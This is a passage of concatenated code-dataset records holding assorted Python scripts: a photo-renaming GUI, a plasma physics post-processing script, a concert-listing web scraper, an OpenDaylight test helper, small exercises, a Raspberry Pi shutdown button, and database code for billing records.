Reminder: position == current_tag+1 \"\"\"\n\n print(\"Picture slider moved, message received by observer:\", peers_position)\n if self.myside == UI_LEFT:\n # I am left side, I have to be smaller\n if self.current_tag < int(peers_position):\n print(\"Left is more to the left: do nothing\")\n pass\n else:\n print(\"Left needs to move {} {} \".format(self.current_tag, int(peers_position)))\n self.current_tag = int(peers_position)-1\n self.current_tag = max( self.current_tag, 0 )\n\n elif self.myside == UI_RIGHT:\n # I am the right side, I have to be bigger\n if self.current_tag > int(peers_position):\n print(\"Right is more to the right\")\n pass\n else:\n print(\"Right needs to move {} {} \".format(self.current_tag, int(peers_position)))\n self.current_tag = int(peers_position)+1\n self.current_tag = min(self.current_tag, len(self.processed_tag_list)-1)\n\n\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def receive_message(self, message):\n \"\"\"\n Default observer callback function\n :return:\n \"\"\"\n print(\"{} :received {}\".format(self, message))\n\n def get_currenttag(self):\n return self.current_tag\n\n def goto_tag(self,position):\n self.current_tag=position\n self.update_all_widgets()\n\n\nclass RenameUI:\n def __init__(self, canvas_width, canvas_height, canvas_bg_colour, grid_hsize, num_recommendations, dir, db_file,\n publisher):\n self.root_window = Tk()\n self.dir = dir\n self.db_file = db_file\n self.current_row = 0\n self.grid_hsize = grid_hsize\n self.num_recommendations = num_recommendations\n self.canvas_width = canvas_width\n self.canvas_height = canvas_height\n self.canvas_bg_colour = canvas_bg_colour\n self.lbl_currentpicname = Label()\n # This is a message dispatcher object\n self.publisher = publisher\n\n self.processed_tag_list = jpgcollectinfo.read_list_from_file(db_file)\n\n self.current_tag = 0\n\n self.create_widgets()\n\n self.left_img.cb_start()\n self.right_img.cb_right() # displaying the next picture by default on the right hand side\n\n def create_widgets(self):\n self.create_menu()\n self.create_left_and_right_images()\n self.create_timeslider_rename_area()\n self.create_bottom_info_area()\n\n def create_menu(self):\n # Creating first row of UI\n # This will be the menubar\n self.menu_bar = Menu()\n self.file_menu = Menu(self.menu_bar, tearoff=0)\n\n self.file_menu.add_command(label=\"Select folder ...\", command=self.cb_file)\n self.file_menu.add_command(label=\"Select db file...\", command=self.cb_datafile)\n self.file_menu.add_command(label=\"Save db ...\", command=self.cb_save)\n self.file_menu.add_command(label=\"Quit\", command=exit)\n self.menu_bar.add_cascade(label=\"File\", menu=self.file_menu)\n self.menu_bar.add_cascade(label=\"Scan folder\", command=self.cb_scan)\n self.menu_bar.add_cascade(label=\"Rename source files\", command=self.cb_rename)\n self.menu_bar.add_cascade(label=\"Help\")\n self.root_window.config(menu=self.menu_bar)\n\n def create_left_and_right_images(self):\n self.left_img = ImageShowUI(self, self.publisher)\n self.left_img.myside = UI_LEFT\n self.publisher.observer_register(\"picture_slider_moved\", self.left_img,\n self.left_img.observer_picture_slider_moved)\n\n self.right_img = ImageShowUI(self, self.publisher)\n self.right_img.myside = UI_RIGHT\n self.publisher.observer_register('picture_slider_moved', self.right_img,\n self.right_img.observer_picture_slider_moved)\n\n self.left_frame = self.left_img.img_frame\n 
self.right_frame = self.right_img.img_frame\n\n self.left_frame.grid(row=0, column=0)\n self.right_frame.grid(row=0, column=1)\n self.current_row = self.current_row + 5\n\n def create_timeslider_rename_area(self):\n\n frame_slider = Frame(self.root_window)\n\n # Creating next row of UI\n # slider for how many to pics display at once\n lbl_a = Label(frame_slider, text=\" Pictures taken within \")\n\n self.scl_withintime = Scale(frame_slider, orient=HORIZONTAL, length=300, to=300,\n command=self.cb_scale_withintime)\n self.scl_withintime.set(15)\n\n self.lbl_numberofpic = Label(frame_slider, text=\" minutes is xxxx.\")\n\n lbl_a.pack(side=LEFT)\n self.scl_withintime.pack(side=LEFT)\n self.lbl_numberofpic.pack(side=LEFT)\n frame_slider.grid(row=self.current_row, columnspan=self.grid_hsize)\n self.current_row += 1\n\n\n\n # Creating next row of UI\n # Rename to part\n frame_rename = Frame(self.root_window)\n\n lbl_renameto = Label(frame_rename, text=\"Rename to\")\n\n\n self.entry_renameto = Entry(frame_rename, text=\"default rename to\", width=100)\n #self.entry_renameto.grid(row=self.current_row, column=1, columnspan=self.grid_hsize - 1)\n\n btn_ok = Button(frame_rename, text=\" OK \", command=self.cb_rename)\n #btn_ok.grid(row=self.current_row, column=4)\n\n lbl_renameto.pack(side=LEFT)\n self.entry_renameto.pack(side=LEFT)\n btn_ok.pack(side=LEFT)\n frame_rename.grid(row=self.current_row, columnspan=self.grid_hsize)\n self.current_row += 1\n\n def create_bottom_info_area(self):\n # Creating next row of UI\n # Name of working folder and DB\n self.lbl_current_settings = Label(self.root_window,\n text=\"Source folder: {} Exif DB file: {}\".format(self.dir, self.db_file))\n\n self.lbl_current_settings.grid(row=self.current_row, column=0, columnspan=self.grid_hsize)\n self.current_row += 1\n\n def cb_scale_withintime(self, position):\n self.update_all_widgets()\n\n def update_all_widgets(self):\n \"\"\"\n Will update all google labels, picture name, slider, settings info\n :return: nothing\n \"\"\"\n count = self.number_of_pics_in_range()\n print(\"Number of pics in range {}\".format(count))\n a_txt = \"minutes is \" + str(count) + \".\"\n self.lbl_numberofpic[\"text\"] = a_txt\n #TODO: uncomment this:\n #cur_pos = self.left_img.get_currenttag()\n #self.right_img.goto_tag(cur_pos + count)\n\n def number_of_pics_in_range(self):\n \"\"\"\n Will return the number of pictures\n from currently showing pic\n to the value of\n :return:\n \"\"\"\n count = 0\n max_delta = int(self.scl_withintime.get())\n\n max_delta = datetime.timedelta(minutes=max_delta).total_seconds()\n self.current_tag=self.left_img.get_currenttag()\n for tag in self.processed_tag_list[self.current_tag:]:\n delta = jpgcollectinfo.timedifference(tag, self.processed_tag_list[self.current_tag])\n if abs(delta.total_seconds()) < max_delta:\n count = count + 1\n return count\n\n def cb_file(self):\n print(\"cb file\")\n self.root_window.filename = filedialog.askdirectory(initialdir=self.dir, title=\"Select folder\")\n print(self.root_window.filename)\n self.dir = self.root_window.filename\n self.update_all_widgets()\n messagebox.showinfo(\"Information\", \"Go and select a DB file then scan\")\n\n def cb_datafile(self):\n print(\"cb data file\")\n self.root_window.dbfilename = filedialog.askopenfilename(initialdir=self.root_window.filename,\n title=\"Select file\",\n filetypes=((\"EXIF db pickle\", \"*.db\"),\n (\"all files\", \"*.*\")))\n if self.root_window.dbfilename == \"\":\n self.db_file = self.dir + \"/\" + \"exif_db.db\"\n else:\n 
self.db_file = self.root_window.dbfilename\n print(self.db_file)\n self.update_all_widgets()\n\n messagebox.showinfo(\"Information\", \"Check settings below and run scan...\")\n\n def cb_scan(self):\n print(\"cb scan\")\n\n google_api_key = jpgcollectinfo.read_api_key_from_file()\n\n # List the files in JPG_DIR\n filelist = jpgcollectinfo.findjpg(self.dir)\n number_of_files_found = len(filelist)\n print(\"Found {} files to scan\".format(number_of_files_found))\n\n # Load the database file\n # We have data in this DB from the files scanned\n # earlier\n self.processed_tag_list = jpgcollectinfo.read_list_from_file(self.db_file)\n\n # We will narrow down the list of files\n # so we will check only new files not found in our DB\n jpgcollectinfo.remove_processed_files(filelist, self.processed_tag_list)\n print(\"Number of files to process after filtering: {}\".format(len(filelist)))\n\n # Collect EXIF info from all JPG images\n taglist = jpgcollectinfo.gettags(filelist)\n\n # Filter down this list a bit, since I do not need this many info\n # Might want to skip this step\n smalllist = jpgcollectinfo.filtertags(taglist)\n\n # Add decimal GPS info to the list items\n # the new tags will be mylat and mylon\n jpgcollectinfo.add_decimal_GPS(smalllist)\n # Log on to google geomap API\n # to collect \"address\" information based on GPS coordinates\n jpgcollectinfo.add_google_maps_info(smalllist, google_api_key)\n\n # Check\n jpgcollectinfo.printtags(smalllist)\n\n # We will have to concatenate\n # the list of fresh files\n # with the list of already processed files\n if len(self.processed_tag_list) == 0:\n new_processed_list = smalllist\n else:\n new_processed_list = self.processed_tag_list + smalllist\n\n # Sort by date\n jpgcollectinfo.sort_tags_byexifdate(new_processed_list)\n\n # We are working with globals, so we need to have the result in a global var\n self.processed_tag_list = new_processed_list\n\n # update their copy of the working list\n self.left_img.set_processed_tag_list(self.processed_tag_list)\n self.right_img.set_processed_tag_list(self.processed_tag_list)\n # Display the first pic\n self.left_img.cb_start()\n self.right_img.cb_right()\n\n def cb_update_db(self):\n print(\"cb updatedb\")\n # TODO: complete this\n\n def cb_save(self):\n print(\"cb save\")\n jpgcollectinfo.sort_tags_byexifdate(self.processed_tag_list)\n jpgcollectinfo.save_list_to_file(self.processed_tag_list, self.db_file)\n\n def cb_rename(self):\n print(\"cb rename\")\n # TODO: complete this\n\n def observer_google_button_pushed(self, button_text):\n \"\"\" If a google button was pushed, this callback function updates the renameto entry field \"\"\"\n\n print(\"Google button pushed, message received by observer:\", button_text)\n self.entry_renameto.delete(0, END)\n self.entry_renameto.insert(0, button_text)\n self.update_all_widgets()\n\n def observer_picture_slider_moved(self, position):\n self.update_all_widgets()\n\n def receive_message(self, message):\n \"\"\"\n Default observer callback function\n :return:\n \"\"\"\n print(\"{} :received {}\".format(self, message))\n\n\ndef load_image(filename):\n \"\"\"\n Will try to load an image and return a PIL object\n Currently will also resize the image to 20% of orig\n :param filename: name of the file to load\n :return: PIL image\n \"\"\"\n # TODO: APULAI to move this into the class\n try:\n fp = open(filename, \"rb\")\n im = Image.open(fp, \"r\")\n w = im.width\n h = im.height\n r1 = w / CANVAS_WIDTH\n r2 = h / CANVAS_HEIGHT\n\n if r1 > r2:\n if r1 > 1:\n w = w * (1 / 
r1)\n h = h * (1 / r1)\n else:\n if r2 > 1:\n w = w * (1 / r2)\n h = h * (1 / r2)\n\n size = int(w), int(h)\n # print(size)\n im.thumbnail(size)\n return im\n except IOError:\n print(\"cannot create thumbnail for\", filename)\n return None\n\n\ndef main():\n # We are creating a publisher, where you can subscibe to these events\n pub = Publisher((\"google_button_pushed\", \"picture_slider_moved\"))\n\n c = RenameUI(CANVAS_WIDTH, CANVAS_HEIGHT, CANVAS_BG_COLOUR, GRID_HSIZE, GOOGLE_RECOMMENDATIONS, DEFAULTDIR,\n EXIF_DB_FILE, pub)\n if len(c.processed_tag_list) < 1:\n exit(1)\n pub.observer_register('google_button_pushed', c, c.observer_google_button_pushed)\n pub.observer_register('picture_slider_moved', c, c.observer_picture_slider_moved)\n\n print(c.processed_tag_list[c.current_tag][\"myfilename\"])\n\n messagebox.showinfo(\"Information\", \"You can select a different working directory. \\n Select a DB file. \"\n \"\\n Run Scan \")\n\n # Init the pictures\n # c.left_img.cb_start()\n # c.right_img.cb_right()\n\n c.root_window.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"displaythumbs-oo.py","file_name":"displaythumbs-oo.py","file_ext":"py","file_size_in_byte":24555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475564893","text":"import numpy as np\nimport sys\nfrom scipy.interpolate import splev, splrep\n\ncut = np.loadtxt(\"postproc/exprs_midplane_s00760_cut.dat\", unpack=True)\nder = np.loadtxt(\"postproc/exprs_midplane_s00760_der.dat\", unpack=True)\navg = np.loadtxt(\"postproc/exprs_averaged_s00760.dat\", unpack=True)\navg_der = np.loadtxt(\"postproc/exprs_averaged_s00760_der.dat\", unpack=True)\nqpsin, q = np.loadtxt(\"postproc/qprofile_s00760.dat\", unpack=True)\n\ncut_psin = cut[4][1:]\ncut_der_dp_dpsin = der[5] / 1.e3 # kPa/Tm^2\ncut_R0 = cut[0][1]\ncut_B0 = cut[10][1]\n\navg_psin = avg[0][1:]\navg_currdens = avg[8][1:] / 1.e6 # MA/m^2\navg_der_dp_dpsin = avg_der[3] # Pa/Tm^2\navg_der_dr_dpsin = avg_der[14] # 1/Tm\navg_der_dp_dr = avg_der_dp_dpsin / avg_der_dr_dpsin # Pa/m\navg_der_alpha = avg_der[13]\n\ntck_qprof = splrep(qpsin, q, s=0.000)\navg_qprof = splev(avg_psin, tck_qprof, der=0)\n\navg_alpha = -2. * 4e-7*np.pi * cut_R0 * avg_qprof**2. / cut_B0**2. 
* avg_der_dp_dr\n\nmax_avg_edge_currdens = np.max(avg_currdens[avg_psin>0.8])\nmax_edge_avg_der_alpha = np.max(avg_der_alpha[avg_psin>0.8])\nmax_edge_avg_alpha = np.max(avg_alpha[avg_psin>0.8])\nmin_edge_cut_dp_dpsi = np.min(cut_der_dp_dpsin[cut_psin>0.8])\n\nt, gm_0, gm_n, gk_0, gk_n = np.loadtxt(str(sys.argv[1]), comments='%', unpack=True)\nwith open(\"macroscopic_vars.dat\") as mv:\n for i, line in enumerate(mv):\n if i == 4:\n n = int(line[11:])\n\nsqrt_mu0_rho0 = 5.6695e-7\nt = t * sqrt_mu0_rho0 * 1e3 # [ms]\ngk_0 = gk_0 / sqrt_mu0_rho0 # [s^-1]\ngk_n = gk_n / sqrt_mu0_rho0 # [s^-1]\ngm_0 = gm_0 / sqrt_mu0_rho0 # [s^-1]\ngm_n = gm_n / sqrt_mu0_rho0 # [s^-1]\n\nt = t[gm_n>0]\ngk_0 = gk_0[gm_n>0]\ngk_n = gk_n[gm_n>0]\ngm_0 = gm_0[gm_n>0]\ngm_n = gm_n[gm_n>0]\n\nt0 = int(np.ceil(t[0]))\n\ngm_0 = gm_0[t>t[0]+0.5]\ngm_n = gm_n[t>t[0]+0.5]\ngk_0 = gk_0[t>t[0]+0.5]\ngk_n = gk_n[t>t[0]+0.5]\nt = t[t>t[0]+0.5]\n\n#print(\"blocks of 100\")\ngm_n_100 = gm_n[0:99]\navg_block = np.mean(gm_n_100)\nstd_block = np.std(gm_n_100)\n#print(\"{0} {1}\".format(avg_block, std_block))\nfor i,gamma in enumerate(gm_n[:-99]):\n gm_n_100 = gm_n[i:i+99]\n local_avg = np.mean(gm_n_100)\n local_std = np.std(gm_n_100)\n if local_std < std_block:\n std_block = local_std\n avg_block = local_avg\n\n#print(\"{0} {1}\".format(avg_block, std_block))\n\nif avg_block > 2.*std_block and std_block < 20000:\n print(\"{0} {1} {2} {3} {4} {5} {6} {7}\".format(t0, n, avg_block, std_block, max_avg_edge_currdens, max_edge_avg_alpha, min_edge_cut_dp_dpsi, max_edge_avg_der_alpha))\nelse:\n print(\"{0} {1} 0.0 0.0 {2} {3} {4} {5}\".format(t0, n, max_avg_edge_currdens, max_edge_avg_alpha, min_edge_cut_dp_dpsi, max_edge_avg_der_alpha))\n\n","sub_path":"scripts/ppiT/growth_rates-avg.py","file_name":"growth_rates-avg.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"259680386","text":"import bs4\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom collections import defaultdict\nfrom dateutil.parser import parse\n\nfrom itertools import chain\n\n# https://stackoverflow.com/questions/26910708/merging-dictionary-value-lists-in-python\n# https://stackoverflow.com/questions/1720421/how-do-i-concatenate-two-lists-in-python\n\n# ----------------------------\n# How are the results formatted?\n# ----------------------------\n# result_format = {\n# 'DATE' : [\n# {'HEADLINER': ''\n# 'SUPPORT': ''\n# 'VENUE': ''\n# 'TIME': ''\n# 'PRICE': ''\n# }\n# ]\n# }\n# ----------------------------\n# Example result from bb\n# ----------------------------\n# scape_bowery_present_results['6/20/2019'][3] = {\n# 'headliner': 'Cuco',\n# 'support': 'Triathlon',\n# 'venue': 'Brooklyn Steel',\n# 'time': 'Doors 07:00 PM, Show: 08:00 PM',\n# 'price': 'Advance: $25.00 / Day of Show: $25.00'\n# }\n\n\n# ----------------------------\n# Bowery Presents\n# ----------------------------\ndef scape_bowery_present():\n driver = webdriver.Firefox()\n driver.get('https://www.bowerypresents.com/new-york-metro/calendar/')\n\n calendar_days = driver.find_elements_by_class_name('calendar-day')\n\n results = defaultdict(list)\n for day in calendar_days:\n day_title = day.find_element_by_class_name('calendar-day-title').text\n print(day_title)\n # Sanitize date. 
Example: 'Sunday, June 16' -> '6/16/19'\n # WARNING: dateutil.parser is infering year when it isn't explicit\n day_title = parse(day_title)\n print(day_title)\n day_title = f\"{day_title.month}/{day_title.day}/{day_title.year}\"\n print(day_title)\n\n \n try:\n events = day.find_elements_by_class_name('event-information-wrapper')\n except NoSuchElementException:\n events = None\n\n if events:\n for event in events:\n headliner = event.find_element_by_class_name('event-headliner').text\n support = event.find_element_by_class_name('event-support').text\n venue = event.find_element_by_class_name('event-venue').text\n \n # Note: time and price are not displayed on the page before clicking the element\n # get_attribute('innerText') is used to get the hidden text\n time = event.find_element_by_class_name('calendar-event-details').find_element_by_class_name('event-time').get_attribute('innerText')\n price = event.find_element_by_css_selector('.calendar-event-details .event-text .event-price').get_attribute('innerText')\n\n results[day_title].append({'headliner':headliner, \n 'support':support,\n 'venue':venue,\n 'time':time,\n 'price': price\n })\n driver.close()\n return results\n\n\n# ----------------------------\n# Mercury East\n# ----------------------------\ndef scrape_mercury_east():\n driver = webdriver.Firefox()\n driver.get('http://www.mercuryeastpresents.com/')\n \n event_list = driver.find_elements_by_class_name('titleSize')\n\n results = defaultdict(list)\n for event in event_list:\n headliner = event.find_element_by_class_name('tSize').text\n # Note: sometimes supporting acts are only visable by clicking the element\n support = event.find_element_by_class_name('supports').text\n \n # Note: date needs to be sanitized\n date = event.find_element_by_class_name('eventDate').text\n print(date)\n date = parse(date)\n print(date)\n date = f\"{date.month}/{date.day}/{date.year}\"\n print(date)\n \n venue = event.find_element_by_class_name('venue-name-calendar').text\n # Note: time needs to be sanitized\n time = event.find_element_by_class_name('eventTime').text\n\n # Note: price needs to be sanitized\n price = event.find_element_by_class_name('ticket-price-list').text \n price = price.replace('Price: ','')\n\n results[date].append({'headliner':headliner, \n 'support':support,\n 'venue':venue,\n 'time':time,\n 'price': price\n })\n driver.close()\n return results\n\nbb = scape_bowery_present()\nme = scrape_mercury_east()\n\nbb.keys()\nme.keys()\n\n\n\n# ----------------------------\n# Combine the result dictionaries \n# ----------------------------\n\nresults = defaultdict(list)\nfor k, v in chain(bb.items(), me.items()):\n results[k].extend(v)\n\nme['7/01/2019']\n\ntype(me)\n\nme.keys()\n# ----------------------------\n# Combining Dictionaries v2\n# ----------------------------\n\n# dictionaries with non-equal keys, values all lists for simplicity\none = {'a': [1, 2], 'c': [5, 6], 'b': [3, 4], 'e': [6.2]}\ntwo = {'a': [2.4, 3.4], 'c': [5.6, 7.6], 'b': [3.5, 4.5], 'f': [1.3]}\n\nfrom collections import defaultdict\nfrom itertools import chain\n\ncombi = defaultdict(list)\nfor k,v in chain(one.items(), two.items()):\n combi[k].extend(v) \n\ncombi\n\n\nbirds = ['crow', 'chicken']\nwhales = ['orca', 'blue']\n\n\n\n# https://stackoverflow.com/questions/1720421/how-do-i-concatenate-two-lists-in-python\n\n\n\n# ----------------------------\n# PEP 448 -- Additional Unpacking Generalizations\n# -- Unpacking inside containers \n\n# ----------------------------\n# Example 1 \nx = (*[1,'a'], *[2], 
3)\n\n# Example 2 \nl = {'x': 1}\nm = {'y': 2}\nn = {**l, **m}\n\n# Example 3\n(*range(4), 4)\n[*range(4), 4]\n\n# In dictionararies, later values will always override earlier ones \n\n# Old way of combining dictionaries \ncombination = first_dictionary.copy()\ncombination.update({'new_key':'new_value'})\n\n# new way of combining dictionaries \ncombination = {**first_dictionary, 'new_key':'new_value'}\n\n# Function calls continue to have the restriction that keyword argumnets must follow positional arguments \n# ** unpackings must follow * unpackings\n\n# If an argument is given multiple times, such as an argument given both positionally and by keyword -- a TypeError is raised\n\n# Disadvantages\n*elements, = [1,2,3]\nelements = [1,2,3],\n # Duplicate keys in dictionaries allowed. But duplicate keys in function call syntax raises an error\n\n# ----------------------------\n# \n# ----------------------------\n\n","sub_path":"discover_gigs/scrapers.py","file_name":"scrapers.py","file_ext":"py","file_size_in_byte":6516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"72013739","text":"import json\n\n\nclass SanityLibrary:\n\n def get_flow_content(self, tid=1, fid=1, priority=1):\n\n flow_template = '''\n\n false\n \n \n 0\n \n \n 0\n \n \n \n \n \n %s\n %s\n 4294967295\n false\n \n \n \n 2048\n \n \n 10.0.0.1\n \n %s\n %s\n %s\n false\n'''\n\n flow_data = flow_template % (tid, fid, fid, 'TestFlow-{0}'.format(fid), priority)\n return flow_data\n\n def is_cluter_set_up(self, rsp1, rsp2, rsp3):\n try:\n states = []\n for r in [rsp1, rsp2, rsp3]:\n rj = json.loads(r)\n states.append(rj['value']['RaftState'])\n states.sort()\n if states == ['Follower', 'Follower', 'Leader']:\n return True\n except Exception:\n return False\n return False\n\n def get_persistence(self, rsp):\n try:\n rj = json.loads(rsp)\n return rj['module'][0]['distributed-datastore-provider:config-properties']['persistent']\n except:\n pass\n","sub_path":"test/tools/OF_Test/robot_suites/500__OF_Cluster_Sanity_OF/SanityLibrary.py","file_name":"SanityLibrary.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541397044","text":"# Verificação de expressões\n\nconta = 0\ncontf = 0\nexpre = str(input(\"Digite uma expressão: \"))\n\nfor i in range(0, len(expre)):\n if expre[i] == \"(\":\n conta += 1\n if expre[i] == \")\":\n contf += 1\nif conta == contf:\n print(\"Está expressão é valida!\")\nelse:\n print(\"Está expressão não é válida!\")","sub_path":"Mundo 3/Exercícios/ex_083.py","file_name":"ex_083.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"332112967","text":"#!/usr/bin/python\n\nimport RPi.GPIO as GPIO\nimport time\nimport subprocess\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(13,GPIO.IN,pull_up_down=GPIO.PUD_UP)\n\nbtn_down = 0\n\nwhile True:\n if GPIO.input(13) == True:\n btn_down += 1\n print(\"Button down for \", 5-btn_down)\n else:\n btn_down = 0\n\n if btn_down > 4:\n print(\"Shuting down, now!\")\n subprocess.call(\"halt\")\n GPIO.cleanup()\n break\n time.sleep(1)","sub_path":"System/Device/RPi.GPIO.py","file_name":"RPi.GPIO.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593257449","text":"import random\r\n# 新建列表类型存储字符串和数字\r\nstrs = []\r\n# 添加字符\r\nfor i in (65,97):\r\n 
for j in range(26):\r\n strs += chr(i+j)\r\n# 添加数字\r\nfor i in range(10):\r\n strs += str(i)\r\n# 输出10个8位的密码\r\nfor i in range(10):\r\n print(\"密码\", i+1, \":\",end= '')\r\n for j in range(8):\r\n print(strs[random.randint(0,61)], end= '')\r\n print()\r\n","sub_path":"6.1.py","file_name":"6.1.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83890361","text":"import os\nimport csv\nimport sys\nimport time\n\nfrom util import csv_preprocss, string_preprocess, record_word_frequency\n\nitem_path = sys.argv[1]\nfile_length = int(sys.argv[2])\n\nif(not os.path.exists(item_path)):\n assert False, \"第一个命令行参数必须输入有效路径\"\n\ncol = csv.register_dialect('mydialect',delimiter='\\t',quoting=csv.QUOTE_ALL)\n\ninfo_dict = None\ninfo_length = 0\nvalid_line = []\nwith open(item_path, 'r') as f:\n file_list = csv.reader(f, 'mydialect')\n valid_line.append(next(file_list))\n valid_length = len(valid_line[0])\n for i in range(file_length):\n try:\n content = next(file_list)\n if(len(content) != valid_length): continue\n valid_line.append(content) \n info_length += 1\n except:\n print(\"{} line bad.\".format(i+1))\n \n info_dict = csv_preprocss(valid_line)\n\nbase_name = os.path.split(item_path)[1].split('.')[0]\n\nwith open(base_name + '_benchmark.txt', 'w') as f:\n for line in valid_line:\n line = ''.join([x+'\\t' for x in line])\n f.write(line + '\\n')\n\nwith open(base_name + '.txt', 'w') as f:\n f.write('marketplace customer_id string encode\\n')\n string = \"\"\n length = 0\n word_list = []\n line_list = []\n start = time.time()\n for i in range(info_length):\n market_info = info_dict['marketplace'][i]\n customer_id_info = info_dict['customer_id'][i]\n string = info_dict['review_body'][i]\n string = string_preprocess(string)\n line_list.append([market_info, customer_id_info, string])\n for word in string:\n word_list.append(word)\n end = time.time()\n\n word_list_sorted = record_word_frequency(word_list, base_name + '_word_info.txt')\n\n for line in line_list:\n encode_list = [str(word_list_sorted.index(x)) + '_' for x in line[-1]]\n encode_str = ''.join(encode_list)\n f.write('{} {} {} {}\\n'.format(*tuple(line), encode_str))\n","sub_path":"C题/do.py","file_name":"do.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"435486999","text":"from datetime import datetime\r\nfrom cx_Oracle import connect\r\n\r\nfrom models import Debtor, Premise, Rate, Address, Invoice, PTJ, Payment, Reading\r\n\r\ndef get_database_connection():\r\n db_connect = connect('foo', 'bar', 'baz')\r\n db_cursor = db_connect.cursor()\r\n\r\n return (db_connect, db_cursor)\r\n\r\ndef close_database_connection(connection):\r\n db, cursor = connection\r\n\r\n db.close()\r\n\r\ndef get_debtor_details(debtor, connection):\r\n connect, cursor = connection\r\n\r\n query = Debtor.get_query(debtor.debtornum)\r\n\r\n details = cursor.execute(query).fetchone()\r\n\r\n if details:\r\n debtor.firstname = details[0]\r\n debtor.surname = details[1]\r\n debtor.company_code = details[2]\r\n debtor.on_ebill = details[3]\r\n debtor.phone_number = details[4]\r\n debtor.email_address = details[5]\r\n\r\n debtor.save()\r\n\r\ndef get_address_details(premise, connection):\r\n connect, cursor = connection\r\n query = Address.get_query(premise.premnum)\r\n\r\n row = cursor.execute(query).fetchone()\r\n\r\n address = Address()\r\n address.street_name = row[0]\r\n 
address.street_number = row[1]\r\n address.city = row[2]\r\n address.state = row[3]\r\n address.postal = row[4]\r\n address.save()\r\n\r\n return address\r\n\r\ndef get_last_rate(debtor, premise, connection):\r\n connect, cursor = connection\r\n rate_query = Rate.get_query(debtor.debtornum, premise.premnum)\r\n\r\n\r\n row = cursor.execute(rate_query).fetchone()\r\n\r\n rate = Rate()\r\n rate.offer = row[0]\r\n rate.rate = row[1]\r\n rate.effective_from = row[2]\r\n rate.effective_to = row[3]\r\n rate.save()\r\n\r\n return rate\r\n\r\ndef get_last_reading(debtor, premise, connection):\r\n connect, cursor = connection\r\n\r\n query = Reading.get_query(debtor.debtornum, premise.premnum)\r\n\r\n row = cursor.execute(query).fetchone()\r\n\r\n reading, created = Reading.objects.get_or_create(reading=row[0], read_date=row[1], read_method=row[2], invoice_num=row[3])\r\n\r\n return reading\r\n\r\ndef get_premises(debtor, connection):\r\n connect, cursor = connection\r\n premises = []\r\n\r\n query = Premise.get_query(debtor.debtornum)\r\n\r\n for row in cursor.execute(query).fetchall():\r\n try:\r\n premise = Premise.objects.get(premnum__exact=row[0])\r\n except Premise.DoesNotExist:\r\n premise = Premise()\r\n\r\n premise.premnum = row[0]\r\n premise.debtor = debtor\r\n premise.esiid = row[1]\r\n premise.start_date = row[2]\r\n premise.status = row[3]\r\n premise.address = get_address_details(premise, connection)\r\n premise.rate = get_last_rate(debtor, premise, connection)\r\n premise.reading = get_last_reading(debtor, premise, connection)\r\n premise.end_date = row[4]\r\n premise.save()\r\n\r\n premises.append(premise)\r\n\r\n return premises\r\n\r\ndef get_last_payment(debtor, connection):\r\n connect, cursor = connection\r\n\r\n query = Payment.get_query(debtor.debtornum)\r\n\r\n row = cursor.execute(query).fetchone()\r\n\r\n payment, created = Payment.objects.get_or_create(debtor=debtor, date_received=row[0], payment_amt=row[1], channel=row[2])\r\n\r\ndef get_last_invoice(debtor, connection):\r\n connect, cursor = connection\r\n\r\n query = Invoice.get_query(debtor.debtornum)\r\n\r\n row = cursor.execute(query).fetchone()\r\n\r\n invoice, created = Invoice.objects.get_or_create(invoice_num__exact=row[0])\r\n invoice.debtor = debtor\r\n invoice.invoice_num = row[0]\r\n invoice.invoice_date = row[1]\r\n invoice.invoice_amt = row[2]\r\n invoice.due_date = row[3]\r\n invoice.save()\r\n\r\ndef get_recent_ptjs(debtor, connection):\r\n connect, cursor = connection\r\n\r\n query = PTJ.get_query(debtor.debtornum)\r\n\r\n for row in cursor.execute(query).fetchall():\r\n try:\r\n ptj = PTJ.objects.get(ptj_number__exact=row[0])\r\n except PTJ.DoesNotExist:\r\n ptj = PTJ()\r\n\r\n try:\r\n premise, created = Premise.objects.get_or_create(premnum=row[5])\r\n except:\r\n premise = None\r\n\r\n ptj.ptj_number = row[0]\r\n ptj.debtor = debtor\r\n ptj.premise = premise\r\n ptj.type_code = row[1]\r\n ptj.class_code = row[2]\r\n ptj.subclass_code = row[3]\r\n ptj.status_code = row[4]\r\n ptj.date_logged = row[6]\r\n ptj.date_status = row[7]\r\n ptj.save()\r\n\r\ndef get_details(debtornum):\r\n connection = get_database_connection()\r\n\r\n try:\r\n debtor = Debtor.objects.get(debtornum__exact=debtornum)\r\n created = False\r\n except Debtor.DoesNotExist:\r\n debtor = Debtor(debtornum=debtornum)\r\n created = True\r\n\r\n if created or (datetime.now() - debtor.last_modified).days > 0:\r\n # been more than a day since we updated, let's update the info, or a new debtor\r\n #get_debtor_details(debtor, 
